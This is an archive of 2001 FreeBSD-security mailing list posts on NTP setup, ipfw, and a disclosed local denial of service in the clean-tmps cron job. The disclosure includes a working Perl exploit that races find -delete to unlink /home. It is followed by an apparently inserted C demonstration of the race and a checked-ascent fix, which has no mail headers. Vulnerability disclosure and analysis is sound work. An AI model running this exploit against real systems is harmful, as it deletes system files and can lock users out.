Veldhouse" , freebsd-security@FreeBSD.ORG Message-ID: <3B0D6174.D95D5FD9@lmc.ericsson.se> Date: Thu, 24 May 2001 15:31:00 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: setting time without changing securelevel References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> <20010524202506.B466@apollo> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dominic Marks wrote: > > Hello, > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. sysinstall can also do this for you. A. -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 13: 9:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id B163F37B424 for ; Thu, 24 May 2001 13:09:24 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 9C9CDBA40; Thu, 24 May 2001 15:09:20 -0500 (CDT) Message-ID: <00a401c0e48d$32db04f0$3028680a@tgt.com> From: "Thomas T. 
Veldhouse" To: "Hank Wethington" , "Dominic Marks" Cc: References: Subject: Re: setting time without changing securelevel Date: Thu, 24 May 2001 15:07:44 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A cron job using ntpdate actually changes your time. Which may not be good for data going into a database, especially data keyed off of the time. ntpd will adjust the speed of your system clock so that it slows down or speeds up to match the "network" clock. This is friendly to database activity. I don't see why I would need a hardware extension to keep time accurate. Accurate time is not that much of an issue (a minute or two is OK with me), but I do want all my machines synced. Also, I don't expose the time daemon to the outside world, so the exploit is only local, and my users are trusted. FreeBSD doesn't actually use xntpd, it migrated over (back?) to ntp some time back. I think the xntpd knob should probably be changed. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Hank Wethington" To: "Thomas T. Veldhouse" ; "Dominic Marks" Cc: Sent: Thursday, May 24, 2001 2:39 PM Subject: RE: setting time without changing securelevel > An issue you might have to look into would be the fact that there is an > exploit for ntpd that does extend to xntpd. If you're just getting time > periodically and not having to be a server for the rest of the network, then > a cron job for using ntpdate would probably be a better way to go. If you do > need it for network time serving, you might be better off getting a GPS > setup to give ntp the time over a serial connection.
> > Hank Wethington > Information Logistics > > ================================================ > www.GoInfoLogistics.com > mailto:info@GoInfoLogistics.com > ================================================ > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Thursday, May 24, 2001 12:32 PM > To: Dominic Marks > Cc: freebsd-security@freebsd.org > Subject: Re: setting time without changing securelevel > > > I found a similar article myself (I don't remember the URL though). I have > had it running for quite some time (well -- a week or so). I didn't see > that it recommends you use more than one server to synchronize with. I am > currently using 4 public servers. > > That looks like a pretty decent article. It, like the rest, fails to inform > you how to run your new server as a time server for the rest of your > network. I can ntptrace to it on the local machine, but it won't respond to > other clients on my LAN. > > Tom Veldhouse > veldy@veldy.net > > > ----- Original Message ----- > From: "Dominic Marks" > To: "Thomas T. Veldhouse" > Cc: > Sent: Thursday, May 24, 2001 2:25 PM > Subject: Re: setting time without changing securelevel > > Hello, > > On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > > knob). It is not hard to setup, but the documentation [that is readable] > is > > scarce. > > > > Tom Veldhouse > > veldy@veldy.net > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. > > -- > Dominic Marks > > Don't talk to me about Naval tradition. > It's nothing but rum, sodomy and the lash."
> -- Winston Churchill > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 15:40:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts13-srv.bellnexxia.net (tomts13.bellnexxia.net [209.226.175.34]) by hub.freebsd.org (Postfix) with ESMTP id BFE9D37B422 for ; Thu, 24 May 2001 15:39:57 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.29.112]) by tomts13-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010524223956.NSFI25498.tomts13-srv.bellnexxia.net@frogbox.glassfish.net> for ; Thu, 24 May 2001 18:39:56 -0400 Received: (qmail 25048 invoked from network); 24 May 2001 22:42:56 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 24 May 2001 22:42:56 -0000 From: "Michael Tang Helmeste" To: Subject: RE: setting time without changing securelevel Date: Thu, 24 May 2001 18:39:02 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <00a401c0e48d$32db04f0$3028680a@tgt.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ah.. well I run an IRC server that uses the time to determine what to do in netsplits. If the time goes off, all the servers split off. 
Thanks for all the feedback people, I'll look into NTP :) -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. Veldhouse Sent: Thursday, May 24, 2001 4:08 PM To: Hank Wethington; Dominic Marks Cc: freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel A cron job using ntpdate actually changes your time. Which may not be good for data going into a database, especially data keyed off of the time. ntpd will adjust the speed of your system clock so that it slows down or speeds up to match the "network" clock. This is friendly to database activity. I don't see why I would need a hardware extension to keep time accurate. Accurate time is not that much of an issue (a minute or two is OK with me), but I do want all my machines synced. Also, I don't expose the time daemon to the outside world, so the exploit is only local, and my users are trusted. FreeBSD doesn't actually use xntpd, it migrated over (back?) to ntp some time back. I think the xntpd knob should probably be changed. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Hank Wethington" To: "Thomas T. Veldhouse" ; "Dominic Marks" Cc: Sent: Thursday, May 24, 2001 2:39 PM Subject: RE: setting time without changing securelevel > An issue you might have to look into would be the fact that there is an > exploit for ntpd that does extend to xntpd. If you're just getting time > periodically and not having to be a server for the rest of the network, then > a cron job for using ntpdate would probably be a better way to go. If you do > need it for network time serving, you might be better off getting a GPS > setup to give ntp the time over a serial connection.
> > Hank Wethington > Information Logistics > > ================================================ > www.GoInfoLogistics.com > mailto:info@GoInfoLogistics.com > ================================================ > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Thursday, May 24, 2001 12:32 PM > To: Dominic Marks > Cc: freebsd-security@freebsd.org > Subject: Re: setting time without changing securelevel > > > I found a similar article myself (I don't remember the URL though). I have > had it running for quite some time (well -- a week or so). I didn't see > that it recommends you use more than one server to synchronize with. I am > currently using 4 public servers. > > That looks like a pretty decent article. It, like the rest, fails to inform > you how to run your new server as a time server for the rest of your > network. I can ntptrace to it on the local machine, but it won't respond to > other clients on my LAN. > > Tom Veldhouse > veldy@veldy.net > > > ----- Original Message ----- > From: "Dominic Marks" > To: "Thomas T. Veldhouse" > Cc: > Sent: Thursday, May 24, 2001 2:25 PM > Subject: Re: setting time without changing securelevel > > Hello, > > On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > > knob). It is not hard to setup, but the documentation [that is readable] > is > > scarce. > > > > Tom Veldhouse > > veldy@veldy.net > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. > > -- > Dominic Marks > > Don't talk to me about Naval tradition. > It's nothing but rum, sodomy and the lash."
> -- Winston Churchill > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 16:22:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id F421E37B423 for ; Thu, 24 May 2001 16:22:10 -0700 (PDT) (envelope-from rich@rdrose.org) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id AAA19936 for ; Fri, 25 May 2001 00:22:10 +0100 Date: Fri, 25 May 2001 00:22:10 +0100 (BST) From: rich@rdrose.org X-Sender: rik@pkl.net To: security@freebsd.org Subject: Apologies... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Okay, maybe I should have been on the list (or mentioned that I wasn't on it). I'm on the list now... The patch that I made, WHICH NEEDS DEBUGGING (still) can now be found at: http://rikrose.net/patch-more-security.
rik To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 17:26: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from rgmail.regenstrief.org (rgmail.regenstrief.org [134.68.31.197]) by hub.freebsd.org (Postfix) with ESMTP id B761C37B422 for ; Thu, 24 May 2001 17:25:59 -0700 (PDT) (envelope-from gunther@aurora.regenstrief.org) Received: from aurora.regenstrief.org (rgnout.regenstrief.org [134.68.31.38]) by rgmail.regenstrief.org (8.11.0/8.8.7) with ESMTP id f4P0SiX08158; Thu, 24 May 2001 19:28:44 -0500 Message-ID: <3B0DA693.9A424222@aurora.regenstrief.org> Date: Fri, 25 May 2001 00:25:55 +0000 From: Gunther Schadow Organization: Regenstrief Institute for Health Care X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: alexus Cc: Bill Mitcheson , freebsd-security@FreeBSD.ORG Subject: Re: ipfw problems. References: <3B0C3130.11D3DCBA@pyramus.com> <000b01c0e3de$5ce01c90$01000001@book> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org alexus wrote: > > show us your /etc/rc.conf file and don't forget the rc.firewall file too :-) -Gunther -- Gunther Schadow, M.D., Ph.D. 
gschadow@regenstrief.org Medical Information Scientist Regenstrief Institute for Health Care Adjunct Assistant Professor Indiana University School of Medicine tel:1(317)630-7960 http://aurora.regenstrief.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 21:15: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 2DCE637B422 for ; Thu, 24 May 2001 21:14:56 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 48953 invoked from network); 25 May 2001 04:17:58 -0000 Received: from localhost (HELO alexus) (root@127.0.0.1) by localhost with SMTP; 25 May 2001 04:17:58 -0000 Message-ID: <001d01c0e4d1$79dcb8a0$0100a8c0@alexus> From: "alexus" To: "Gunther Schadow" Cc: "Bill Mitcheson" , References: <3B0C3130.11D3DCBA@pyramus.com> <000b01c0e3de$5ce01c90$01000001@book> <3B0DA693.9A424222@aurora.regenstrief.org> Subject: Re: ipfw problems. Date: Fri, 25 May 2001 00:16:29 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm pretty much sure that he just didn't enable firewall.. so there will be no need for rc.firewall;) but we shall see;) ----- Original Message ----- From: "Gunther Schadow" To: "alexus" Cc: "Bill Mitcheson" ; Sent: Thursday, May 24, 2001 8:25 PM Subject: Re: ipfw problems. > alexus wrote: > > > > show us your /etc/rc.conf file > > and don't forget the rc.firewall file too :-) > > -Gunther > > -- > Gunther Schadow, M.D., Ph.D.
gschadow@regenstrief.org > Medical Information Scientist Regenstrief Institute for Health Care > Adjunct Assistant Professor Indiana University School of Medicine > tel:1(317)630-7960 http://aurora.regenstrief.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 1:42:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 7CF7C37B422 for ; Fri, 25 May 2001 01:42:46 -0700 (PDT) (envelope-from sheldonh@uunet.co.za) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 153DBC-0001pR-00; Fri, 25 May 2001 10:42:42 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id KAA01100; Fri, 25 May 2001 10:42:40 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 951; Fri May 25 10:42:04 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.22 #1) id 153DAa-000KhW-00; Fri, 25 May 2001 10:42:04 +0200 To: Dominic Marks Cc: "Thomas T. Veldhouse" , freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel In-reply-to: Your message of "Thu, 24 May 2001 20:25:06 +0100." <20010524202506.B466@apollo> Date: Fri, 25 May 2001 10:42:04 +0200 Message-ID: <79577.990780124@axl.fw.uunet.co.za> From: Sheldon Hearn Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 24 May 2001 20:25:06 +0100, Dominic Marks wrote: > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with.
Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. It's even easier than that. Use the tzsetup(8) utility. The diary article should mention it. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 7:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from oblr.sm.energy.gov.ua (soe.sumy.net [194.153.148.73]) by hub.freebsd.org (Postfix) with ESMTP id 3AA6F37B422 for ; Fri, 25 May 2001 07:25:49 -0700 (PDT) (envelope-from anv@smenergy.com.ua) Received: from obl3r.sm.energy.gov.ua (obl3r.sm.energy.gov.ua [10.109.1.1]) by oblr.sm.energy.gov.ua (Sendmail 8.who.cares/1) with ESMTP id RAA16580 for ; Fri, 25 May 2001 17:25:43 +0300 (EEST) Received: from anv (anv.sm.energy.gov.ua [10.109.1.39]) by obl3r.sm.energy.gov.ua (8.8.8/8.8.5) with SMTP id RAA21486 for ; Fri, 25 May 2001 17:25:21 +0300 (EEST) Message-ID: <000b01c0e526$94f3d6a0$27016d0a@sm.energy.gov.ua> From: "Andrey Nebogin" To: Subject: help Date: Fri, 25 May 2001 17:25:21 +0300 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org help list To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10: 3:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost1.dircon.co.uk (mailhost1.dircon.co.uk [194.112.32.65]) by hub.freebsd.org (Postfix) with ESMTP id 64E8C37B423 for ; Fri, 25 May 2001 10:03:33 -0700 (PDT) (envelope-from 
nick@cleaton.net) Received: from laptop (desk77.ch.dircon.net [195.157.3.77]) by mailhost1.dircon.co.uk (8.9.3/8.9.3) with ESMTP id SAA80671 for ; Fri, 25 May 2001 18:03:32 +0100 (BST) Received: (from nick@localhost) by laptop (8.9.3/8.9.3) id SAA00526 for security@freebsd.org; Fri, 25 May 2001 18:03:54 +0100 Date: Fri, 25 May 2001 18:03:54 +0100 From: Nick Cleaton To: security@freebsd.org Subject: 4.3 Security: local DoS via clean-tmps Message-ID: <20010525180354.A434@lt1.cleaton.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="VbJkn9YxBvnuCH5J" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline

Tested in 4.3-RELEASE only:

If /etc/periodic/daily/clean-tmps is enabled, then it's possible for any local user to trick it into calling unlink() or rmdir() on anything in the root directory.

The problem is that "find -delete" can be made to do chdir("..") multiple times followed by unlink() and/or rmdir().

588 find CALL chdir(0x280e227d)
588 find NAMI ".."
588 find RET chdir 0
588 find CALL chdir(0x280e227d)
588 find NAMI ".."
588 find RET chdir 0
588 find CALL chdir(0x280e227d)
588 find NAMI ".."
588 find RET chdir 0
588 find CALL chdir(0x280e227d)
588 find NAMI ".."
588 find RET chdir 0
588 find CALL unlink(0x8051440)
588 find NAMI "sys"

This means it can be tricked into going up too high by moving its current directory higher up the hierarchy, by for example doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is somewhere under "/tmp/1/2/3".

The attached exploit will cause it to delete the /home -> /usr/home symlink. I think this would render it impossible to log into a system configured for non-root ssh access via DSA key only.
This could also be used to unlink other users' files in /tmp without regard to their age.

--
Nick Cleaton
nick@cleaton.net

--VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=ditch

#!/usr/bin/perl5 -w
use strict;

# The thing in / that we want to unlink.
my $target = 'home';

######################################################

use Fatal qw(mkdir chdir open utime rename link);

chdir '/tmp';
mkdir 'x47', 0755;
chdir 'x47';
mkdir 'foo', 0755;
oldfile($target);
chdir 'foo';
mkdir 'bar', 0755;
chdir 'bar';
mkdir 'tree', 0755;
chdir 'tree';
oldfile('trigger');
mkdir 'big', 0755;

# build something that will take a while to tear down
chdir 'big';
for my $f (1..50) {
    oldfile($f);
    for my $l (1..100) {
        link $f, "$f.$l";
    }
}
chdir '..';

print "waiting for the cron job...\n";
fork and exit;
while (-r 'trigger') {
    select undef, undef, undef, 0.1;
}
rename '/tmp/x47/foo/bar/tree', '/tmp/x48';

sub oldfile {
    my $file = shift;
    open OUT, ">$file";
    utime 0, 0, $file;
}

--VbJkn9YxBvnuCH5J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:44: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 0F00537B422 for ; Fri, 25 May 2001 10:44:02 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 8887 invoked from network); 25 May 2001 17:47:07 -0000 Received: from localhost (HELO book) (root@127.0.0.1) by localhost with SMTP; 25 May 2001 17:47:07 -0000 Message-ID: <001301c0e542$474fd3b0$01000001@book> From: "alexus" To: "Nick Cleaton" , References: <20010525180354.A434@lt1.cleaton.net> Subject: Re: 4.3 Security: local DoS via clean-tmps Date: Fri, 25 May 2001 13:43:59 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft
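The race Nick describes, as an added stand-alone illustration (this is neither FreeBSD's find(1)/fts(3) code nor Nick's exploit): a walker descends into a directory tree recording the (st_dev, st_ino) identity of every ancestor, an attacker then renames an intermediate directory away, and the walker climbs back with chdir("..") the way 4.3's "find -delete" does. The naive ascent lands outside the tree it started in, which is what the chdir("..") run in the ktrace above shows; the checked ascent opens "..", fstat()s it, and refuses to fchdir() unless the identity matches the directory it descended from, so it stops instead of reaching something like "sys" or "home" in /. The directory names x47/foo/bar/tree/big mirror the exploit; the base directory under $TMPDIR (or /tmp) and the ASCEND_* result codes are this example's own assumptions.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* A directory's identity: the (device, inode) pair survives a rename, a pathname does not. */
struct dir_id { dev_t dev; ino_t ino; };

static int id_of_cwd(struct dir_id *id)
{
    struct stat st;
    if (stat(".", &st) != 0) return -1;
    id->dev = st.st_dev; id->ino = st.st_ino;
    return 0;
}

static int same_id(const struct dir_id *a, const struct dir_id *b) { return a->dev == b->dev && a->ino == b->ino; }

/* What 4.3's "find -delete" does: ascend blindly, trusting ".." to be the directory it came from. */
static int naive_ascend(const struct dir_id *expect) { (void)expect; return chdir(".."); }

/* Hardened ascent: open "..", prove it is the recorded parent, and only then fchdir() to it. */
static int checked_ascend(const struct dir_id *expect)
{
    struct stat st;
    int rc, fd = open("..", O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || st.st_dev != expect->dev || st.st_ino != expect->ino) {
        close(fd);
        errno = ENOENT;   /* the parent was moved out from under us: stop here, delete nothing */
        return -1;
    }
    rc = fchdir(fd);
    close(fd);
    return rc;
}

enum { ASCEND_OK = 0, ASCEND_REFUSED = 1, ASCEND_WRONG_DIR = 2 };

/*
 * Constructed sample tree <base>/x47/foo/bar/tree/big (the exploit's names).  Descend into
 * big recording each ancestor's identity, play the attacker by renaming tree to <base>/x48,
 * then ascend three levels expecting to land in foo.  Returns an ASCEND_* code, -1 on setup error.
 */
static int race_demo(int (*ascend)(const struct dir_id *))
{
    static const char *const names[] = { "x47", "foo", "bar", "tree", "big" };
    static const char *const leftovers[] = { "x48/big", "x48", "x47/foo/bar", "x47/foo", "x47" };
    const char *tmp = getenv("TMPDIR");
    struct dir_id ancestor[6], here;   /* ancestor[i]: identity of the directory at depth i, 0 = base */
    char base[256], from[512], to[512];
    int startfd, i, result = ASCEND_OK;

    snprintf(base, sizeof base, "%s/findrace.%ld", tmp ? tmp : "/tmp", (long)getpid());
    startfd = open(".", O_RDONLY | O_DIRECTORY);
    if (startfd < 0 || mkdir(base, 0700) != 0 || chdir(base) != 0) return -1;

    /* Descend, noting where we came from at every level, as a careful walker must. */
    id_of_cwd(&ancestor[0]);
    for (i = 0; i < 5; i++) {
        if (mkdir(names[i], 0700) != 0 || chdir(names[i]) != 0) return -1;
        id_of_cwd(&ancestor[i + 1]);
    }

    /* The attacker's move while the walker is busy inside big: mv x47/foo/bar/tree x48 */
    snprintf(from, sizeof from, "%s/x47/foo/bar/tree", base);
    snprintf(to, sizeof to, "%s/x48", base);
    if (rename(from, to) != 0) return -1;

    /* Ascend big -> tree -> bar -> foo according to the walker's bookkeeping. */
    for (i = 5; i > 2; i--) {
        if (ascend(&ancestor[i - 1]) != 0) { result = ASCEND_REFUSED; break; }
    }
    if (result == ASCEND_OK && (id_of_cwd(&here) != 0 || !same_id(&here, &ancestor[2])))
        result = ASCEND_WRONG_DIR;   /* an unlink("home") here would hit a directory find never meant to touch */

    /* Clean up: return to the starting directory and remove what we built. */
    fchdir(startfd);
    close(startfd);
    for (i = 0; i < 5; i++) {
        snprintf(from, sizeof from, "%s/%s", base, leftovers[i]);
        rmdir(from);
    }
    rmdir(base);
    return result;
}

int main(void)
{
    printf("naive chdir(\"..\"): %d (2 = ended up in the wrong directory)\n", race_demo(naive_ascend));
    printf("checked fchdir():  %d (1 = refused once the parent had moved)\n", race_demo(checked_ascend));
    return 0;
}
```

The two ascents differ only in the step that matters: the naive one trusts the name ".." while the tree can change under it, the checked one trusts an inode it recorded on the way down and refuses to continue when the two disagree. Stopping is the right failure mode for a deleter; a walker that keeps going and deletes relative to a directory it never verified is exactly what turns a stale cron cleanup into an unlink() in /.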
Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

How can I make sure that I don't have this enabled? And is there a fix for that?

----- Original Message -----
From: "Nick Cleaton"
To:
Sent: Friday, May 25, 2001 1:03 PM
Subject: 4.3 Security: local DoS via clean-tmps

>
> Tested in 4.3-RELEASE only:
>
> If /etc/periodic/daily/clean-tmps is enabled, then it's possible
> for any local user to trick it into calling unlink() or rmdir()
> on anything in the root directory.
>
> The problem is that "find -delete" can be made to do chdir("..")
> multiple times followed by unlink() and/or rmdir().
>
> 588 find CALL chdir(0x280e227d)
> 588 find NAMI ".."
> 588 find RET chdir 0
> 588 find CALL chdir(0x280e227d)
> 588 find NAMI ".."
> 588 find RET chdir 0
> 588 find CALL chdir(0x280e227d)
> 588 find NAMI ".."
> 588 find RET chdir 0
> 588 find CALL chdir(0x280e227d)
> 588 find NAMI ".."
> 588 find RET chdir 0
> 588 find CALL unlink(0x8051440)
> 588 find NAMI "sys"
>
> This means it can be tricked into going up too high by moving
> its current directory higher up the hierarchy, by for example
> doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is
> somewhere under "/tmp/1/2/3".
>
> The attached exploit will cause it to delete the /home -> /usr/home
> symlink. I think this would render it impossible to log into a
> system configured for non-root ssh access via DSA key only.
>
> This could also be used to unlink other users' files in /tmp
> without regard to their age.
> > -- > Nick Cleaton > nick@cleaton.net > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:53:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 5DE1E37B423 for ; Fri, 25 May 2001 10:53:41 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f4PHrMG62258; Fri, 25 May 2001 13:53:22 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 25 May 2001 13:53:17 -0400 (EDT) From: Rob Simmons To: alexus Cc: Nick Cleaton , security@FreeBSD.ORG Subject: Re: 4.3 Security: local DoS via clean-tmps In-Reply-To: <001301c0e542$474fd3b0$01000001@book> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

That is off by default in FreeBSD. You would have had to add a line like this to /etc/periodic.conf

daily_clean_tmps_enable="YES"

The line in /etc/defaults/periodic.conf is:

daily_clean_tmps_enable="NO"

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 25 May 2001, alexus wrote:

> How can I make sure that I don't have this enabled? And is there a fix for
> that?
>
> ----- Original Message -----
> From: "Nick Cleaton"
> To:
> Sent: Friday, May 25, 2001 1:03 PM
> Subject: 4.3 Security: local DoS via clean-tmps
>
>
> >
